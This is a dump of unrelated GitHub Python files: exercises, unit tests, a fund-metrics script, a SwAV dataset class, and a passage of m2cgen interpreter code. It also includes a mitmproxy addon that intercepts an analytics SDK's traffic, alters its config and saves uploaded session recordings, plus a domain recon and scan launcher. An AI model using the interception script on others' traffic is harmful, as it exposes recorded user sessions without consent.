trinh\")","repo_name":"tranthaibinh111/MySqlToSqlServer","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13846018240","text":"# Curso de Python - PDTI-SENAC/RN\n# Profº Weskley Bezerra\n# Mitchell Oliveira\n# 06/08/2020\n# --------------------------------------------------------------\n# Faça um Programa que leia um vetor de 10 números reais e mostre-os na ordem inversa.\n\nnumeros = []\n\nfor indice in range(1,11):\n numero = input(f\"Informe o número {indice}: \")\n numero = int(numero)\n numeros.append(numero)\n\nnumeros.sort(reverse = True)\n\nprint(numeros)","repo_name":"mitchelloliveira/python-pdti","sub_path":"Aula04_06082020/aula04_exe02.py","file_name":"aula04_exe02.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28809659812","text":"import numpy as np\nimport pandas as pd\nfrom pandas.testing import assert_series_equal\n\nfrom chalet.preprocess.od_pairs_helpers import get_unknown_sites\nfrom tests.preprocess.stub_data import get_stub_nodes, get_stub_od_pairs\n\n\ndef test_id_partially_equal_nan():\n \"\"\"Test for get_unknown_sites with node id partially equal to nan\"\"\"\n nodes = get_stub_nodes()\n nodes[\"ID\"] = 2 * [np.nan] + [3, 4]\n od_pairs = get_stub_od_pairs()\n expected = pd.Series([1, 2])\n\n actual = get_unknown_sites(od_pairs, nodes)\n\n assert_series_equal(actual, expected)\n\n\ndef test_id_equal_nan():\n \"\"\"Test for get_unknown_sites with node id equal to nan\"\"\"\n nodes = get_stub_nodes()\n nodes[\"ID\"] = np.nan\n od_pairs = get_stub_od_pairs()\n expected = pd.Series([1, 2, 3, 4], index=[0, 1, 2, 5])\n\n actual = get_unknown_sites(od_pairs, nodes)\n\n assert_series_equal(actual, expected)\n\n\ndef test_no_unknown_sites():\n \"\"\"Test for get_unknown_sites with no unknown sites\"\"\"\n nodes = get_stub_nodes()\n od_pairs = get_stub_od_pairs()\n\n result = get_unknown_sites(od_pairs, nodes)\n\n assert len(result) == 0\n","repo_name":"amzn/chalet-charging-location-for-electric-trucks","sub_path":"src/tests/preprocess/od_pairs_helpers/test_get_unknown_sites.py","file_name":"test_get_unknown_sites.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"72"} +{"seq_id":"17294611774","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\"\"\"\n此脚本实现的功能为对托管的产品进行信息汇总\n输入:副本产品净值.xlsx\n输出:托管产品汇总.xlsx\n\"\"\"\n\n###导入用到的库\nimport pandas as pd\nfrom pandas import Series\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport time\nfrom WindPy import w\npath = os.getcwd()\nos.chdir(path)\n\n###定义用到的函数\ndef theround(value,n=4):\n \"\"\"\n theround函数实现的功能是对value(浮点型数据)保留n位有效数字\n \"\"\"\n return(int(value*10**n)/10**n)\n\ndef max_drawdown(netvalue):\n \"\"\"\n max_drawdown函数的主要功能是计算序列的最大回撤\n \"\"\"\n \n maxhere = [] #当前时点的最大值\n drawdown = [] #当前时点的回撤\n for i in range(len(netvalue)):\n temp = netvalue[0:(i+1)]\n maxheretemp = max(temp)\n drawdowntemp = netvalue[i]/maxheretemp - 1\n drawdowntemp = drawdowntemp*(-1)\n maxhere.append(maxheretemp)\n drawdown.append(drawdowntemp) \n maxdrawdown = max(drawdown)\n maxdrawdown = maxdrawdown*100\n maxdrawdown = theround(maxdrawdown)\n return(maxdrawdown)\n \n\n# 计算收益波动率的函数\ndef volatility(netvalue):\n \"\"\"\n :param netvalue: 净值序列(list类型)\n :return: 输出回测期间的收益波动率\n \"\"\"\n rtn = []\n for i in range((len(netvalue) - 1)):\n temp1 = netvalue[i]\n temp2 = netvalue[(i+1)]\n rtntemp = temp2/temp1 - 1\n rtn.append(rtntemp)\n \n from math import sqrt\n # 计算波动率\n vol = np.std(rtn)* sqrt(250)\n vol = vol*100\n vol = theround(vol)\n return(vol)\n \n# 计算贝塔的函数\ndef beta(netvalue1, netvalue2):\n \"\"\"\n :param netvalue1: 产品的净值序列\n :param netvalue2: 指数的净值序列\n :return: 输出beta值\n \"\"\"\n return_line = []\n indexreturn_line = []\n for i in range((len(netvalue1))):\n return_line.append(netvalue1[(i+1)]/netvalue1[i] - 1)\n indexreturn_line.append(netvalue2[(i+1)]/netvalue2[i] - 1)\n df = pd.DataFrame({ 'rtn': return_line, 'benchmark_rtn': indexreturn_line})\n # 账户收益和基准收益的协方差除以基准收益的方差\n b = df['rtn'].cov(df['benchmark_rtn']) / df['benchmark_rtn'].var()\n return(b)\n\n \n \n\n#从Wind中读取沪深300指数数据\nw.start()\nHS300 = w.wsd(\"000300.SH\",\"close\",'20160101','20161223')\nHS300Data = HS300.Data\nHS300Times = HS300.Times\n\nHS300Data = HS300Data[0]\n#HS300Data = pd.DataFrame(HS300.Data)\n\n#print(max_drawdown(HS300Data))\n\n\n#HS300Close = HS300.Data\n#print(HS300Close)\n\n#print(HS300)\n\n#读入数据\nAllNetValueData = pd.read_excel('副本产品净值.xlsx','SQL Results',index_col = None, na_values=['NA'])\nAllProduct = np.unique(AllNetValueData['VC_CPMC'])\nprint(AllProduct)\n\nresult = pd.DataFrame(AllProduct,columns = ['产品名称'],index = AllProduct)\nprint(result)\nfor Product in AllProduct:\n #print(Product)\n NetValueData = AllNetValueData[AllNetValueData['VC_CPMC'] == Product]\n NetValueDataThisYear = NetValueData[NetValueData['TRADE_DATE'] > 20160100]\n n = len(NetValueData.index)\n n1 = len(NetValueDataThisYear.index)\n \n #产品代码\n result.loc[Product,'产品代码']=np.unique(NetValueData['VC_CPDM'])[0]\n\n #产品今年以来收益率%\n StartValue = NetValueDataThisYear.iloc[0,7]\n EndValue = NetValueDataThisYear.iloc[(n1-1),7]\n value = (EndValue/StartValue - 1)*100\n result.loc[Product,'产品今年以来收益率%'] = theround(value)\n\n #沪深300今年以来收益%\n StartValue = HS300Data[0]\n EndValue = HS300Data[(len(HS300Data) - 1)]\n value = (EndValue/StartValue - 1)*100\n result.loc[Product,'沪深300今年以来收益%'] = theround(value)\n \n \n #产品今年最大回撤%\n netvalue = NetValueDataThisYear.iloc[:,7]\n netvalue = list(netvalue)\n result.loc[Product,'产品今年最大回撤%'] = max_drawdown(netvalue)\n\n #沪深300今年最大回撤%\n netvalue = HS300Data\n netvalue = list(netvalue)\n result.loc[Product,'沪深300今年最大回撤%'] = max_drawdown(netvalue)\n\n #产品今年波动率%\n netvalue = NetValueDataThisYear.iloc[:,7]\n netvalue = list(netvalue)\n result.loc[Product,'产品今年波动率%'] = volatility(netvalue)\n\n #沪深300今年波动率%\n netvalue = HS300Data\n netvalue = list(netvalue)\n result.loc[Product,'沪深300今年波动率%'] = volatility(netvalue)\n\n #产品sharp值\n rf = 2.84 # 无风险利率取10年期国债的到期年化收益率\n rtn = result.loc[Product,'产品今年以来收益率%']*250/len(netvalue)\n result.loc[Product,'产品sharp值'] = (rtn-rf)/result.loc[Product,'产品今年波动率%']\n \n\n #沪深300sharp值\n rf = 2.84 # 无风险利率取10年期国债的到期年化收益率\n rtn = result.loc[Product,'沪深300今年以来收益%']*250/len(netvalue)\n result.loc[Product,'沪深300sharp值'] = (rtn-rf)/result.loc[Product,'产品今年波动率%']\n\n #beta\n netvalue1 = NetValueDataThisYear.iloc[:,7]\n netvalue1 = list(netvalue1)\n netvalue2 = HS300Data\n netvalue2 = list(netvalue2)\n #result.loc[Product,'沪深300今年波动率%'] = beta(netvalue1,netvalue2)\n\n #当前交易日()\n result.loc[Product,'当前交易日']=time.strftime('%Y%m%d',time.localtime(time.time()))\n\n #账户统计日(TRADE_DATE)\n temp = NetValueData.iloc[(n-1),0]\n temp = time.strptime(str(temp), \"%Y%m%d\")\n result.loc[Product,'账户统计日'] = time.strftime('%Y%m%d',temp)\n\n #产品规模(ALL_NETV_MKV)\n result.loc[Product,'产品规模'] = NetValueData.iloc[(n-1),5]\n\n #统计日单位净值(PER_NV)\n result.loc[Product,'统计日单位净值'] = NetValueData.iloc[(n-1),7]\n\n #产品份额(SHARES)\n result.loc[Product,'产品份额'] = NetValueData.iloc[(n-1),9]\n\n #成立以来收益率\n StartValue = NetValueData.iloc[0,7]\n EndValue = NetValueData.iloc[(n-1),7]\n result.loc[Product,'成立以来收益率%'] = (EndValue/StartValue - 1)*100\n \n\n #今年以来收益率\n StartValue = NetValueDataThisYear.iloc[0,7]\n EndValue = NetValueDataThisYear.iloc[(n1-1),7]\n result.loc[Product,'今年以来收益率%'] = (EndValue/StartValue - 1)*100\n\n #账户起始日\n temp = NetValueData.iloc[0,0]\n temp = time.strptime(str(temp), \"%Y%m%d\")\n result.loc[Product,'账户起始日'] = time.strftime('%Y%m%d',temp)\n #起始日单位净值\n result.loc[Product,'起始日单位净值'] = NetValueData.iloc[0,7]\n\nprint(result)\nresult.to_excel(\"托管产品汇总.xlsx\",sheet_name='Sheet1')\n \n \n \n \n\n\n\n\n\n\n","repo_name":"GaobinWang/AdvancedPython","sub_path":"PythonInAction/Task1/托管产品汇总Version1.py","file_name":"托管产品汇总Version1.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35480421334","text":"import pytest\nimport jax\nimport jax.scipy\nimport jax.numpy as jnp\nimport numpy as np\nimport numpy.testing as npt\nimport scipy.linalg\nimport tme.base_jax as tme\nfrom chirpgp.models import g, g_inv, model_chirp, disc_chirp_lcd, disc_chirp_lcd_cond_v, disc_chirp_tme, \\\n disc_chirp_euler_maruyama, disc_m32, disc_model_lascala_lcd, model_harmonic_chirp, disc_harmonic_chirp_lcd\nfrom chirpgp.tools import lti_sde_to_disc\nfrom jax.config import config\n\nconfig.update(\"jax_enable_x64\", True)\n\nnp.random.seed(666)\n\n\nclass TestModels:\n\n def test_g(self):\n \"\"\"Test bijection.\n \"\"\"\n x = jax.random.normal(jax.random.PRNGKey(666), (20,))\n npt.assert_allclose(x, g_inv(g(x)), rtol=1e-14, atol=0)\n\n @pytest.mark.parametrize('lam', [0.1, 1.])\n @pytest.mark.parametrize('b', [0.1, 1.])\n @pytest.mark.parametrize('ell', [0.1, 1.])\n def test_chirp_models(self, lam, b, ell):\n \"\"\"Test model_chirp against lcd_chirp.\n \"\"\"\n sigma, delta = 0.1, 0.1\n drift, dispersion, m0, P0, H = model_chirp(lam, b, ell, sigma, delta)\n m_and_cov = disc_chirp_lcd(lam, b, ell, sigma)\n\n dt = 0.1\n drift_matrix = np.zeros((4, 4))\n lcd_matrix = np.zeros((4, 4))\n for i in range(4):\n u = np.zeros((4,))\n u[i] = 1.\n drift_matrix[:, i] = drift(u)\n lcd_matrix[:, i] = m_and_cov(u, dt)[0]\n\n # Test mean\n npt.assert_allclose(scipy.linalg.expm(drift_matrix * dt), lcd_matrix)\n\n # Test cov\n u = jnp.asarray(np.random.randn(4))\n F, Sigma = lti_sde_to_disc(drift_matrix, dispersion(u), dt)\n npt.assert_allclose(Sigma, m_and_cov(u, dt)[1], rtol=1e-10, atol=1e-10)\n\n @pytest.mark.parametrize('num_harmonics', [1, 2, 3])\n def test_harmonic_chirp_models(self, num_harmonics):\n \"\"\"Test harmonic_model_chirp against lcd_chirp.\n \"\"\"\n lam, b, ell = 1., 1., 1.\n sigma, delta = 0.1, 0.1\n drift, dispersion, m0, P0, H = model_harmonic_chirp(lam, b, ell, sigma, delta, num_harmonics)\n m_and_cov = disc_harmonic_chirp_lcd(lam, b, ell, sigma, num_harmonics)\n\n dim = num_harmonics * 2 + 2\n dt = 0.1\n drift_matrix = np.zeros((dim, dim))\n lcd_matrix = np.zeros((dim, dim))\n for i in range(dim):\n u = np.zeros((dim,))\n u[i] = 1.\n drift_matrix[:, i] = drift(u)\n lcd_matrix[:, i] = m_and_cov(u, dt)[0]\n\n # Test mean\n npt.assert_allclose(scipy.linalg.expm(drift_matrix * dt), lcd_matrix)\n\n # Test cov\n u = jnp.asarray(np.random.randn(dim))\n F, Sigma = lti_sde_to_disc(drift_matrix, dispersion(u), dt)\n npt.assert_allclose(Sigma, m_and_cov(u, dt)[1], rtol=1e-10, atol=1e-10)\n\n @pytest.mark.parametrize('lam', [0.1, 1.])\n @pytest.mark.parametrize('b', [0.1, 1.])\n def test_lcd_chirp_cond_v(self, lam, b):\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 0.1\n\n m_and_cov = disc_chirp_lcd(lam, b, 1., 1.)(u, dt)\n m_and_cov_cond_v = disc_chirp_lcd_cond_v(lam, b)(u[:2], u[2], dt)\n\n npt.assert_allclose(m_and_cov[0][:2], m_and_cov_cond_v[0])\n npt.assert_allclose(m_and_cov[1][:2, :2], m_and_cov_cond_v[1])\n\n def test_chirp_tme_against_lcd(self):\n lam, b, ell, sigma = 0.1, 0.1, 0.1, 0.1\n m_and_cov_lcd = disc_chirp_lcd(lam, b, ell, sigma)\n m_and_cov_tme = disc_chirp_tme(lam, b, ell, sigma, order=3)\n\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 1e-3\n for i in range(2):\n npt.assert_allclose(m_and_cov_lcd(u, dt)[i], m_and_cov_tme(u, dt)[i], atol=1e-5)\n\n def test_chirp_euler(self):\n \"\"\"dummy test.\n \"\"\"\n disc_chirp_euler_maruyama()\n\n def test_disc_m32(self):\n ell, sigma = 1.1, 2.2\n m_and_cov = disc_m32(ell, sigma)\n m_and_cov2 = disc_chirp_lcd(1., 1., ell, sigma)\n\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 1e-2\n npt.assert_allclose(m_and_cov(u[2:], dt)[0], m_and_cov2(u, dt)[0][2:])\n npt.assert_allclose(m_and_cov(u[2:], dt)[1], m_and_cov2(u, dt)[1][2:, 2:])\n\n @pytest.mark.parametrize('ell', [0.2, 1.])\n @pytest.mark.parametrize('sigma', [0.2, 1.])\n def test_disc_model_old_lcd(self, ell, sigma):\n \"\"\"their mean coincides when using LCD.\n \"\"\"\n m_and_cov = disc_model_lascala_lcd(ell, sigma)\n m_and_cov2 = disc_chirp_lcd(lam=jnp.array(0.), b=1., ell=ell, sigma=sigma)\n\n u = jax.random.normal(jax.random.PRNGKey(666), (4,))\n dt = 1e-2\n npt.assert_allclose(m_and_cov(u, dt)[0], m_and_cov2(u, dt)[0])\n\n def test_lcd_against_tme(self):\n \"\"\"LCD and TME should give similar results.\n \"\"\"\n lam, b, ell, sigma = 0.5, 0.1, 0.5, 1.\n drift, dispersion, _, _, _ = model_chirp(lam, b, ell, sigma, 0.1)\n\n m_and_cov_lcd = jax.jit(disc_chirp_lcd(lam, b, ell, sigma))\n m_and_cov_tme = jax.jit(lambda u, dt: tme.mean_and_cov(u, dt, drift, dispersion, order=3))\n\n key = jax.random.PRNGKey(666)\n keys = jax.random.split(key, num=5)\n for key in keys:\n m = jax.random.normal(key, (4,))\n lcd_m, lcd_cov = m_and_cov_lcd(m, 0.01)\n tme_m, tme_cov = m_and_cov_tme(m, 0.01)\n\n npt.assert_allclose(lcd_m, tme_m, rtol=4e-3)\n npt.assert_allclose(lcd_cov, tme_cov, atol=1e-3)\n","repo_name":"spdes/chirpgp","sub_path":"test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":5439,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"43229641433","text":"import json\nfrom mitmproxy import http, ctx\nimport re\nimport uuid\n\nsession_id = uuid.uuid4().hex[:24]\n\ndef response(flow: http.HTTPFlow) -> None:\n global session_id\n\n # config override\n if flow.request.url.endswith(\".api.appsee.com/config\"):\n with open(\"config.json\", \"rb\") as file:\n config = json.loads(file.read())\n \n config[\"SessionId\"] = session_id\n\n flow.response.content = json.dumps(config).encode(\"utf-8\")\n\n elif flow.request.url.endswith(\".api.appsee.com/upload\"):\n content = flow.request.content\n \n decoded_content = content.decode(\"ascii\", \"backslashreplace\")\n filename = re.search('filename=\"(.+?.)\"', decoded_content).group(1)\n start = decoded_content.index(\"Content-Type: application/octet-stream\")\n\n file_data = content[start + 42:-50]\n\n with open(filename, \"ba\") as file:\n file.write(file_data)\n\n response = json.loads(flow.response.text)\n\n if \"VideoUploadPolicy\" in response:\n response[\"VideoUploadPolicy\"] = 2\n\n flow.response.text = json.dumps(response)\n \n session_id = uuid.uuid4().hex[:24]\n\n\n","repo_name":"oncecreated/appsee_watcher","sub_path":"appsee_watcher.py","file_name":"appsee_watcher.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"27211934219","text":"#!/usr/bin/python3\n# coding: utf-8\nimport argparse\nfrom core.port import Port\nfrom core.subdomain import Subdomain\nfrom core.vuln import Vuln\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('--target', default='google.com', help='domain name')\n parser.add_argument('--targets', default='domain.txt',help='domain name file')\n parser.add_argument('-s',action=\"store_true\",help='Subdomain for domain')\n parser.add_argument('-p',action=\"store_true\",help='Port for domain')\n parser.add_argument('-v',action=\"store_true\",help='Vuln for domain')\n # parser.add_argument('-i',action=\"store_true\",help='insert data to db')\n\n args = parser.parse_args()\n domains_list = []\n\n\n\n if args.target:\n domains_list.append(args.target)\n elif args.targets:\n with open(args.targets, 'r', encoding='utf-8') as f:\n for line in f.readlines():\n line = line.strip()\n domains_list.append(line)\n else:\n print('Please enter the domain name or domain name file')\n domains_list = list(set(domains_list))\n if args.s:\n print('Start Subdomain for domain')\n Subdomain(domains_list).list_subdomain()\n if args.p:\n print('Start Port for domain')\n Port(domains_list).list_subdomain()\n if args.v:\n print('Start Vuln for domain')\n Vuln(domains_list).list_subdomain()\n # if args.i:\n # print('Start insert data to db')\n # DB(domains_list).list_subdomain()","repo_name":"kN6jq/gatherpy","sub_path":"gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"21979354380","text":"# Author: Maggie Wolff\n# Due Date: 01/15/2020\n# I have not given or received any unauthorized assistance on this assignment\n# Video link: https://youtu.be/GfqDwLs-EuM\n\n# Function 'grade' will ask a series of questions regarding the assignment and return the calculated grade \n# If any of the must-have elements are missing, the questions will end and a grade of 0 points will be returned \n\ndef grade(score = 1, Grade = 0):\n while score != 0:\n score = int(input('Did the author submit a single uncompressed .py file? Type 1 for yes, 0 for no'))\n if score == 0:\n break\n score = int(input('Did the author include their name and the date? Type 1 for yes, 0 for no'))\n if score == 0:\n break\n score = int(input('Did the author include an honor statement? Type 1 for yes, 0 for no'))\n if score == 0:\n break\n score = int(input('Did the author include a link to an unlisted video? Type 1 for yes, 0 for no'))\n if score == 0:\n break\n correct = int(input('Out of 10, how many points for correctness?'))\n elegance = int(input('Out of 10, how many points for elegance?'))\n hygiene = int(input('Out of 10, how many points for code hygiene?'))\n video = int(input('Out of 10, how many points for video quality?'))\n Grade = correct + elegance + hygiene + video\n break\n return Grade\n\n# Run the function which will return the total points \nresult = grade()\n\n# Print the returned grade value \nprint('The grade is ' + str(result) + ' out of 40 points')\n","repo_name":"maggiewolff/graduate-studies","sub_path":"python-programming/Assignment0101_GradingLogic.py","file_name":"Assignment0101_GradingLogic.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41570589404","text":"import numpy as np\r\nimport cv2\r\n\r\ncap = cv2.VideoCapture(0) #'0'选择笔记本电脑自带参数,‘1’为USB外置摄像头\r\nprint(cap.get(3), cap.get(4)) #查看当前捕获视频的尺寸,默认为640*480\r\ncap.set(propId=3, value=320) #设置你想捕获的视频的宽度\r\ncap.set(propId=4, value=240) #设置你想捕获的视频的高度\r\nprint(cap.get(3), cap.get(4)) #验证是否设置成功\r\nwhile (True):\r\n ret, frame = cap.read() #读取图像并显示\r\n cv2.imshow('frame', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\ncap.release() #按‘q’键退出后,释放摄像头资源\r\ncv2.destroyAllWindows()\r\n","repo_name":"Rex-Lapis/Image-Acquisition","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"33016187568","text":"from datetime import datetime, timedelta\r\n\r\ndef getPrimes(n):\r\n for i in range(2, n + 1):\r\n if primeFun(i):\r\n prime.append(i)\r\n\r\ndef primeFun(n):\r\n if n <= 1 :\r\n return False\r\n for i in range(2, n):\r\n if n % i == 0:\r\n return False\r\n return True\r\ndated, dayofW, n= input().split()\r\nn= int(n)\r\nprime=[]\r\ngetPrimes(365)\r\ndaysdic={0:\"Mon\", 1:\"Tue\", 2:\"Wed\", 3:\"Thu\", 4:\"Fri\", 5:\"Sat\", 6:\"Sun\"}\r\ndated=datetime.strptime(dated, \"%Y%m%d\")\r\ndays=-1\r\nfor i in prime:\r\n date= dated + timedelta(i)\r\n if primeFun(date.month) and daysdic[date.weekday()]==dayofW:\r\n days=i\r\n break\r\nif days==-1:\r\n print(\"No\", 0)\r\nelif days<=n:\r\n print(\"Yes\", days)\r\nelse:\r\n print(\"No\", days)","repo_name":"Nilesh1206/mission_faang","sub_path":"MyCodeVita/prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6942439900","text":"import random\nfrom logging import getLogger\n\nfrom PIL import ImageFilter\nimport numpy as np\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\n\nlogger = getLogger()\n\n\nclass MultiCropDataset(datasets.ImageFolder):\n def __init__(\n self,\n data_path,\n size_crops,\n nmb_crops,\n min_scale_crops,\n max_scale_crops,\n size_dataset=-1,\n return_index=False,\n ):\n super(MultiCropDataset, self).__init__(data_path)\n assert len(size_crops) == len(nmb_crops)\n assert len(min_scale_crops) == len(nmb_crops)\n assert len(max_scale_crops) == len(nmb_crops)\n if size_dataset >= 0:\n self.samples = self.samples[:size_dataset]\n self.return_index = return_index\n\n color_transform = [get_color_distortion(), PILRandomGaussianBlur()]\n mean = [0.485, 0.456, 0.406]\n std = [0.228, 0.224, 0.225]\n trans = []\n for i in range(len(size_crops)):\n randomresizedcrop = transforms.RandomResizedCrop(\n size_crops[i],\n scale=(min_scale_crops[i], max_scale_crops[i]),\n )\n trans.extend([transforms.Compose([\n randomresizedcrop,\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.Compose(color_transform),\n transforms.ToTensor(),\n transforms.Normalize(mean=mean, std=std)])\n ] * nmb_crops[i])\n self.trans = trans\n\n def __getitem__(self, index):\n path, _ = self.samples[index]\n image = self.loader(path)\n multi_crops = list(map(lambda trans: trans(image), self.trans))\n if self.return_index:\n return index, multi_crops\n return multi_crops\n\n\nclass PILRandomGaussianBlur(object):\n \"\"\"\n Apply Gaussian Blur to the PIL image. Take the radius and probability of\n application as the parameter.\n This transform was used in SimCLR - https://arxiv.org/abs/2002.05709\n \"\"\"\n\n def __init__(self, p=0.5, radius_min=0.1, radius_max=2.):\n self.prob = p\n self.radius_min = radius_min\n self.radius_max = radius_max\n\n def __call__(self, img):\n do_it = np.random.rand() <= self.prob\n if not do_it:\n return img\n\n return img.filter(\n ImageFilter.GaussianBlur(\n radius=random.uniform(self.radius_min, self.radius_max)\n )\n )\n\n\ndef get_color_distortion(s=1.0):\n # s is the strength of color distortion.\n color_jitter = transforms.ColorJitter(0.8*s, 0.8*s, 0.8*s, 0.2*s)\n rnd_color_jitter = transforms.RandomApply([color_jitter], p=0.8)\n rnd_gray = transforms.RandomGrayscale(p=0.2)\n color_distort = transforms.Compose([rnd_color_jitter, rnd_gray])\n return color_distort\n","repo_name":"facebookresearch/swav","sub_path":"src/multicropdataset.py","file_name":"multicropdataset.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","stars":1884,"dataset":"github-code","pt":"72"} +{"seq_id":"5584665091","text":"import math\nimport sys\nfrom collections import namedtuple\n\nfrom m2cgen import ast\nfrom m2cgen.interpreters.interpreter import BaseToCodeInterpreter\n\n\nclass BinExpressionDepthTrackingMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin provides an ability to call a custom hook when depth of the\n binary expression reaches certain threshold.\n\n Subclasses must specify value for `bin_depth_threshold`.\n\n By default it creates a variable and assigns it the result of the incoming\n expression interpretation.\n\n Subclasses may override this default behaviour.\n \"\"\"\n\n # disabled by default\n bin_depth_threshold = sys.maxsize\n\n def _pre_interpret_hook(self, expr, bin_depth=0, **kwargs):\n if not isinstance(expr, ast.BinExpr):\n return super()._pre_interpret_hook(expr, **kwargs)\n\n # We track depth of the binary expressions and call a hook if it\n # reaches specified threshold.\n if bin_depth >= self.bin_depth_threshold:\n return self.bin_depth_threshold_hook(expr, **kwargs), kwargs\n\n kwargs[\"bin_depth\"] = bin_depth + 1\n return super()._pre_interpret_hook(expr, **kwargs)\n\n # Default implementation. Simply adds new variable.\n def bin_depth_threshold_hook(self, expr, **kwargs):\n if expr in self._cached_expr_results:\n return self._cached_expr_results[expr].var_name\n result = self._do_interpret(expr, **kwargs)\n var_name = self._cg.add_var_declaration(expr.output_size)\n self._cg.add_var_assignment(var_name, result, expr.output_size)\n return var_name\n\n\nclass LinearAlgebraMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin provides simple way to interpret linear algebra expression as\n function invocation.\n\n It also provides flag `with_linear_algebra` which indicates whether\n linear algebra was used during interpretation. It can be used to add\n corresponding third party dependencies that provide linear algebra\n operations and/or data structures.\n \"\"\"\n\n with_linear_algebra = False\n\n supported_bin_vector_ops = {}\n supported_bin_vector_num_ops = {}\n\n def interpret_bin_vector_expr(self, expr, extra_func_args=(), **kwargs):\n if expr.op not in self.supported_bin_vector_ops:\n raise NotImplementedError(f\"Op '{expr.op.name}' is unsupported\")\n\n self.with_linear_algebra = True\n\n function_name = self.supported_bin_vector_ops[expr.op]\n\n return self._cg.function_invocation(\n function_name,\n self._do_interpret(expr.left, **kwargs),\n self._do_interpret(expr.right, **kwargs),\n *extra_func_args)\n\n def interpret_bin_vector_num_expr(self, expr, extra_func_args=(), **kwargs):\n if expr.op not in self.supported_bin_vector_num_ops:\n raise NotImplementedError(f\"Op '{expr.op.name}' is unsupported\")\n\n self.with_linear_algebra = True\n\n function_name = self.supported_bin_vector_num_ops[expr.op]\n\n return self._cg.function_invocation(\n function_name,\n self._do_interpret(expr.left, **kwargs),\n self._do_interpret(expr.right, **kwargs),\n *extra_func_args)\n\n\nSubroutine = namedtuple('Subroutine', ['name', 'expr'])\n\n\nclass SubroutinesMixin(BaseToCodeInterpreter):\n \"\"\"\n This mixin provides ability to split the code into subroutines based on\n the size of the AST.\n\n Subclasses only need to implement `create_code_generator` method.\n\n Their code generators should implement 3 methods:\n - function_definition;\n - function_invocation;\n - add_return_statement.\n\n Interpreter should prepare at least one subroutine using method\n `enqueue_subroutine` and then call method `process_subroutine_queue` with\n instance of code generator, which will be populated with the result code.\n \"\"\"\n\n # disabled by default\n ast_size_check_frequency = sys.maxsize\n ast_size_per_subroutine_threshold = sys.maxsize\n\n def __init__(self, *args, **kwargs):\n self._subroutine_idx = 0\n self.subroutine_expr_queue = []\n super().__init__(*args, **kwargs)\n\n def process_subroutine_queue(self, top_code_generator):\n \"\"\"\n This method should be called from the interpreter to start processing\n subroutine queue.\n \"\"\"\n self._subroutine_idx = 0\n\n while len(self.subroutine_expr_queue):\n self._reset_reused_expr_cache()\n subroutine = self.subroutine_expr_queue.pop(0)\n subroutine_code = self._process_subroutine(subroutine)\n top_code_generator.add_code_lines(subroutine_code)\n\n def enqueue_subroutine(self, name, expr):\n self.subroutine_expr_queue.append(Subroutine(name, expr))\n\n def _pre_interpret_hook(self, expr, ast_size_check_counter=0, **kwargs):\n if isinstance(expr, ast.BinExpr) and not expr.to_reuse:\n frequency = self._adjust_ast_check_frequency(expr)\n self.ast_size_check_frequency = min(frequency, self.ast_size_check_frequency)\n\n ast_size_check_counter += 1\n if ast_size_check_counter >= self.ast_size_check_frequency:\n ast_size_check_counter = 0\n ast_size = ast.count_exprs(expr)\n if ast_size > self.ast_size_per_subroutine_threshold:\n function_name = self._get_subroutine_name()\n self.enqueue_subroutine(function_name, expr)\n return self._cg.function_invocation(function_name, self._feature_array_name), kwargs\n\n kwargs['ast_size_check_counter'] = ast_size_check_counter\n\n return super()._pre_interpret_hook(expr, **kwargs)\n\n def _adjust_ast_check_frequency(self, expr):\n \"\"\"\n The logic below counts the number of non-binary expressions\n in a non-recursive branch of a binary expression to account\n for large tree-like models and adjust the size check frequency\n if necessary.\n \"\"\"\n cnt = None\n if not isinstance(expr.left, ast.BinExpr):\n cnt = ast.count_exprs(expr.left, exclude_list={ast.BinExpr})\n elif not isinstance(expr.right, ast.BinExpr):\n cnt = ast.count_exprs(expr.right, exclude_list={ast.BinExpr})\n if cnt and cnt < self.ast_size_per_subroutine_threshold:\n return math.ceil(self.ast_size_per_subroutine_threshold / cnt)\n return self.ast_size_check_frequency\n\n def _process_subroutine(self, subroutine):\n \"\"\"\n Handles single subroutine. Creates new code generator and defines a\n function for a given subroutine.\n \"\"\"\n is_vector_output = subroutine.expr.output_size > 1\n\n self._cg = self.create_code_generator()\n\n with self._cg.function_definition(\n name=subroutine.name,\n args=[(True, self._feature_array_name)],\n is_vector_output=is_vector_output):\n last_result = 